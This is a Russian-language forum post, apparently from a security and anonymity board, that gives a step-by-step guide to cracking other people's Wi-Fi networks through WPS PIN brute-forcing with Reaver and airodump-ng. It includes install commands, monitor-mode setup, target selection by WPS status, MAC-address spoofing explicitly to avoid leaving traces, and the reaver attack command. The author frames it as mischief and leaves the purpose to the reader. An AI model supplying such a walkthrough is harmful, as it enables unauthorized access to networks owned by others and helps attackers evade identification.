Взлом Wi-Fi.

Тема в разделе "Сборник статей по безопасности и анонимности", создана пользователем WarTech Support, 13 май 2018.

  1. WarTech Support

    WarTech Support New Member

    Сообщения:
    28
    Симпатии:
    0
    Всем привет. Сегодня раскроем пару карт, а именно, как можно взломать чужой вайфай. Для чего будете использовать это знание, решать только Вам. Нам понадобятся лишь пару инстурментов: сетевой адаптер(blueway N9000). Соотношение цены и качеств самое хорошее. Reaver-wps-fork v. 1.6.4 - его устанавливаем следующим образом:

    Код:
    git clone t6x/reaver-wps-fork-t6x
    cd reaver-wps-fork-t6x
    cd src
    ./configure
    make
    sudo make install

    Airodump-ng. И достаточно много терпения)
    После покупки адаптера и установки всех вышеперечисленных утил начинаем хулиганить.
    В терминале переходим в режим root

    Код:
    sudo -s
    Смотрим все сетевые карты, которые подключены к компу.

    Код:
    ifconfig
    Адаптер имеет название wlan0 или wlan1, в зависимости от подключенных до этого сетевых карт.
    Переводим наш адаптер в режим монитора:

    Код:
    airmon-ng start wlan1
    Он станет wlan1mon
    Поглядим, что у нас там?

    Код:
    airodump-ng -a -W -M -U wlan1mon



    В терминале сразу забегает очень много букв и цифр, аж в глазах может зарябить. 14 колонок. Но все нам не понадобятся.
    По порядку о важных нам колонках:
    Bssid - мак адрес роутера.
    PWR - обратная величина, чем ближе онаfile:///home/groot/Downloads/Screenshot.png
    к нулю тем сильнее сигнал роутера.
    Beacons - так называемые маяки, в которых роутер передает всю инфу о себе.
    CH - канал, по которому вещает роутер. Если Вы хотите сканировать отдельный канал, добавьте к

    Код:
    airodump-ng -a -W -M -U wlan1mon -с + номер канала
    ENC - шифрование. WPA и WPA2 самые распостраненные.
    UPTIME - чем он больше, тем лучше.
    WPS - по этой колонке смотрим, сможем ли мы пробить защиту. Если там Locked или нет совсем ничего - не наш вариант. Все остальное пробуем.
    Выбрали точку, посмотрели все ли нормально. А мак свой поменял? Или наследить решил?
    Код:

    ifconfig wlan1mon down
    macchanger -r wlan1mon - смена мака на рандом
    ifconfig wlan1mon up

    Поехали.
    Во втором терминали под root запускаем нашу пушку:

    Код:
    reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -vv -N
    , где XX:XX:XX:XX:XX:XX - мак адрес точки. Все атака началась, дело это небыстрое, так что можно пока заняться своими делами.

    Некоторые точки замечают атаку и ставят WPS в режим Locked. Поэтому посматривайте иногда. Если все пройдет хорошо, к утру , Вы сможете наблюдать чудо!




    Спасибо за внимание!

Поделиться этой страницей